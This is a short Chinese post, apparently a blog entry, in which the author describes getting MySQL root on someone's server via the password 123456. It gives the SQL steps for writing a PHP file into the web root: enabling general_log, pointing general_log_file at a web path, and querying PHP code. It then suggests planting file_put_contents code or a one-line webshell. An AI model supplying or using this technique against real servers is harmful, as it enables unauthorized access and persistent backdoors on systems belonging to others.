今天偶尔得到一个 mysql 的 root 权限...(这个人密码就是 123456 我也是醉了)
然后我想看看他有什么文件,咋办呢?
#开启日志 set global general_log = on; #设置日志保存地址(比如:/wwwroot/xxx/test.php) set global general_log_file = '绝对路径'; #如果不知道绝对路径可以用这个命令看一下 show variables like "%char%"; #写出文件 select '<?php echo 1; ?>';
然后你访问那个你设置的保存路径就能看见啦.
比如说file_put_content()
之类的 或者 一句话木马啥的都可以